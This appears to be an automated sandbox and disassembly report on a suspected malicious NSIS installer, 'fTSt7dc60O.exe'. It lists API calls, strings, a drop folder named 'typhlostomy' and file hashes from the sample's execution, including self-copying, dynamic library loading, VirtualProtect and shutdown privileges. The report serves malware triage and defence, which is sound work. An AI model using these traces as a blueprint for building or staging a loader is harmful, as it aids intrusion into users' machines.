wsprintfW 5273->5278 5279 405f48 lstrcpynW 5274->5279 5278->5274 5279->5277 5280 4014f1 SetForegroundWindow 5281 4029c7 5280->5281 5282 4018f2 5283 402b3a 18 API calls 5282->5283 5284 4018f9 5283->5284 5285 405724 MessageBoxIndirectW 5284->5285 5286 401902 5285->5286 4462 402573 4463 402b1d 18 API calls 4462->4463 4469 402582 4463->4469 4464 4026a0 4465 4025c8 ReadFile 4465->4464 4465->4469 4466 405c37 ReadFile 4466->4469 4467 4026a2 4474 405e8f wsprintfW 4467->4474 4468 402608 MultiByteToWideChar 4468->4469 4469->4464 4469->4465 4469->4466 4469->4467 4469->4468 4471 4026b3 4469->4471 4472 40262e SetFilePointer MultiByteToWideChar 4469->4472 4471->4464 4473 4026d4 SetFilePointer 4471->4473 4472->4469 4473->4464 4474->4464 5287 401df3 5288 402b3a 18 API calls 5287->5288 5289 401df9 5288->5289 5290 402b3a 18 API calls 5289->5290 5291 401e02 5290->5291 5292 402b3a 18 API calls 5291->5292 5293 401e0b 5292->5293 5294 402b3a 18 API calls 5293->5294 5295 401e14 5294->5295 5296 401423 25 API calls 5295->5296 5297 401e1b ShellExecuteW 5296->5297 5298 401e4c 5297->5298 5304 100016b6 5305 100016e5 5304->5305 5306 10001b18 22 API calls 5305->5306 5307 100016ec 5306->5307 5308 100016f3 5307->5308 5309 100016ff 5307->5309 5310 10001272 2 API calls 5308->5310 5311 10001726 5309->5311 5312 10001709 5309->5312 5315 100016fd 5310->5315 5313 10001750 5311->5313 5314 1000172c 5311->5314 5316 1000153d 3 API calls 5312->5316 5318 1000153d 3 API calls 5313->5318 5317 100015b4 3 API calls 5314->5317 5319 1000170e 5316->5319 5321 10001731 5317->5321 5318->5315 5320 100015b4 3 API calls 5319->5320 5322 10001714 5320->5322 5323 10001272 2 API calls 5321->5323 5324 10001272 2 API calls 5322->5324 5325 10001737 GlobalFree 5323->5325 5326 1000171a GlobalFree 5324->5326 5325->5315 5327 1000174b GlobalFree 5325->5327 5326->5315 5327->5315 5328 10002238 5329 10002296 5328->5329 5331 100022cc 5328->5331 5330 100022a8 GlobalAlloc 5329->5330 5329->5331 5330->5329 4693 4026f9 4694 402700 4693->4694 
4697 402972 4693->4697 4695 402b1d 18 API calls 4694->4695 4696 40270b 4695->4696 4698 402712 SetFilePointer 4696->4698 4698->4697 4699 402722 4698->4699 4701 405e8f wsprintfW 4699->4701 4701->4697 5332 1000103d 5333 1000101b 5 API calls 5332->5333 5334 10001056 5333->5334 5335 402c7f 5336 402c91 SetTimer 5335->5336 5337 402caa 5335->5337 5336->5337 5338 402cf8 5337->5338 5339 402cfe MulDiv 5337->5339 5340 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5339->5340 5340->5338 5342 4014ff 5343 401507 5342->5343 5345 40151a 5342->5345 5344 402b1d 18 API calls 5343->5344 5344->5345 5346 401000 5347 401037 BeginPaint GetClientRect 5346->5347 5348 40100c DefWindowProcW 5346->5348 5349 4010f3 5347->5349 5351 401179 5348->5351 5352 401073 CreateBrushIndirect FillRect DeleteObject 5349->5352 5353 4010fc 5349->5353 5352->5349 5354 401102 CreateFontIndirectW 5353->5354 5355 401167 EndPaint 5353->5355 5354->5355 5356 401112 6 API calls 5354->5356 5355->5351 5356->5355 5357 401a00 5358 402b3a 18 API calls 5357->5358 5359 401a09 ExpandEnvironmentStringsW 5358->5359 5360 401a1d 5359->5360 5362 401a30 5359->5362 5361 401a22 lstrcmpW 5360->5361 5360->5362 5361->5362 5363 401b01 5364 402b3a 18 API calls 5363->5364 5365 401b08 5364->5365 5366 402b1d 18 API calls 5365->5366 5367 401b11 wsprintfW 5366->5367 5368 4029c7 5367->5368 4264 100027c7 4265 10002817 4264->4265 4266 100027d7 VirtualProtect 4264->4266 4266->4265 5376 401f08 5377 402b3a 18 API calls 5376->5377 5378 401f0f GetFileVersionInfoSizeW 5377->5378 5379 401f36 GlobalAlloc 5378->5379 5380 401f8c 5378->5380 5379->5380 5381 401f4a GetFileVersionInfoW 5379->5381 5381->5380 5382 401f59 VerQueryValueW 5381->5382 5382->5380 5383 401f72 5382->5383 5387 405e8f wsprintfW 5383->5387 5385 401f7e 5388 405e8f wsprintfW 5385->5388 5387->5385 5388->5380 5389 401c8e 5390 402b1d 18 API calls 5389->5390 5391 401c94 IsWindow 5390->5391 5392 4019f0 5391->5392 5393 1000164f 5394 10001516 GlobalFree 5393->5394 5397 10001667 5394->5397 5395 
100016ad GlobalFree 5396 10001682 5396->5395 5397->5395 5397->5396 5398 10001699 VirtualFree 5397->5398 5398->5395 5406 401491 5407 4051f2 25 API calls 5406->5407 5408 401498 5407->5408 4498 402295 4499 402b3a 18 API calls 4498->4499 4500 4022a4 4499->4500 4501 402b3a 18 API calls 4500->4501 4502 4022ad 4501->4502 4503 402b3a 18 API calls 4502->4503 4504 4022b7 GetPrivateProfileStringW 4503->4504 4510 401f98 4511 401faa 4510->4511 4521 40205c 4510->4521 4512 402b3a 18 API calls 4511->4512 4513 401fb1 4512->4513 4515 402b3a 18 API calls 4513->4515 4514 401423 25 API calls 4516 402197 4514->4516 4517 401fba 4515->4517 4518 401fd0 LoadLibraryExW 4517->4518 4519 401fc2 GetModuleHandleW 4517->4519 4520 401fe1 4518->4520 4518->4521 4519->4518 4519->4520 4533 40631e WideCharToMultiByte 4520->4533 4521->4514 4524 401ff2 4527 402011 4524->4527 4528 401ffa 4524->4528 4525 40202b 4526 4051f2 25 API calls 4525->4526 4529 402002 4526->4529 4536 10001759 4527->4536 4530 401423 25 API calls 4528->4530 4529->4516 4531 40204e FreeLibrary 4529->4531 4530->4529 4531->4516 4534 406348 GetProcAddress 4533->4534 4535 401fec 4533->4535 4534->4535 4535->4524 4535->4525 4537 10001789 4536->4537 4578 10001b18 4537->4578 4539 10001790 4540 100018a6 4539->4540 4541 100017a1 4539->4541 4542 100017a8 4539->4542 4540->4529 4627 10002286 4541->4627 4610 100022d0 4542->4610 4547 100017cd 4548 1000180c 4547->4548 4549 100017ee 4547->4549 4553 10001812 4548->4553 4554 1000184e 4548->4554 4640 100024a9 4549->4640 4551 100017be 4552 100017c4 4551->4552 4558 100017cf 4551->4558 4552->4547 4621 100028a4 4552->4621 4560 100015b4 3 API calls 4553->4560 4556 100024a9 10 API calls 4554->4556 4555 100017d7 4555->4547 4637 10002b5f 4555->4637 4562 10001840 4556->4562 4557 100017f4 4651 100015b4 4557->4651 4631 10002645 4558->4631 4565 10001828 4560->4565 4569 10001895 4562->4569 4662 1000246c 4562->4662 4568 100024a9 10 API calls 4565->4568 4567 100017d5 4567->4547 4568->4562 4569->4540 4573 1000189f 

                                                      Control-flow Graph

                                                      [Control-flow graph starting at block 40335a-4033f2; graph rendering not preserved]
                                                      APIs
                                                      • #17.COMCTL32 ref: 00403379
                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                      • OleInitialize.OLE32(00000000), ref: 0040338B
                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000000), ref: 004033DB
                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000020), ref: 00403403
                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403558
                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403574
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403585
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040358D
                                                      • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                      • OleUninitialize.OLE32(?), ref: 0040366C
                                                      • ExitProcess.KERNEL32 ref: 0040368C
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000000,?), ref: 00403698
                                                      • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000000,?), ref: 004036A4
                                                      • CreateDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004036B0
                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 004036B7
                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\fTSt7dc60O.exe,0041FEA8,00000001), ref: 00403725
                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                      • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                      • ExitProcess.KERNEL32 ref: 00403827
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\Desktop$C:\Users\user\Desktop\fTSt7dc60O.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                      • API String ID: 4107622049-2308846564
                                                      • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                      • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                      • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                      • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      [Control-flow graph starting at block 405331-40534c; graph rendering not preserved]
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                      • GetClientRect.USER32(?,?), ref: 004053DC
                                                      • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405480
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                      • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                        • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                      • ShowWindow.USER32(00000000), ref: 0040552C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405531
                                                      • ShowWindow.USER32(00000008), ref: 0040557B
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                      • CreatePopupMenu.USER32 ref: 004055C0
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                      • GetWindowRect.USER32(?,?), ref: 004055F4
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                      • OpenClipboard.USER32(00000000), ref: 00405655
                                                      • EmptyClipboard.USER32 ref: 0040565B
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                      • CloseClipboard.USER32 ref: 004056B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: {$&B
                                                      • API String ID: 590372296-2518801558
                                                      • Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                      • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                      • Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                      • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

                                                      Control-flow Graph (graph not reproduced; legend: Executed, Not Executed)
                                                      APIs
                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,?,00405229,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                      • CoTaskMemFree.OLE32(?), ref: 00406113
                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,?,00405229,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                      • String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 900638850-1737829468
                                                      • Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                      • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                      • Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                      • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

                                                      Control-flow Graph (graph not reproduced; legend: Executed, Not Executed)
                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 004057F9
                                                      • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 00405841
                                                      • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 00405864
                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 0040586A
                                                      • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 0040587A
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                      • FindClose.KERNEL32(00000000), ref: 00405929
                                                      Strings
                                                      • "C:\Users\user\Desktop\fTSt7dc60O.exe", xrefs: 004057D9
                                                      • \*.*, xrefs: 0040583B
                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004057DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                      • API String ID: 2035342205-1766276416
                                                      • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                      • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                      • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                      • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                      • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                      • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                      • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,771B2EE0,004057F0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406296
                                                      • FindClose.KERNEL32(00000000), ref: 004062A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: 8WB
                                                      • API String ID: 2295610775-3088156181
                                                      • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                      • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                      • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                      • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                      • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                      • String ID:
                                                      • API String ID: 310444273-0
                                                      • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                      • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                      • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                      • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9
                                                      APIs
                                                      • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 004020FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy
                                                      • API String ID: 542301482-3275360645
                                                      • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                      • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                      • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                      • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54

                                                      Control-flow Graph (graph not reproduced; legend: Executed, Not Executed)
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                      • ShowWindow.USER32(?), ref: 00403D1B
                                                      • DestroyWindow.USER32 ref: 00403D2F
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                      • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                      • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                      • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                      • EnableWindow.USER32(?,?), ref: 00403F9E
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                      • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                      • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: &B

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 004039A0
                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A20
                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
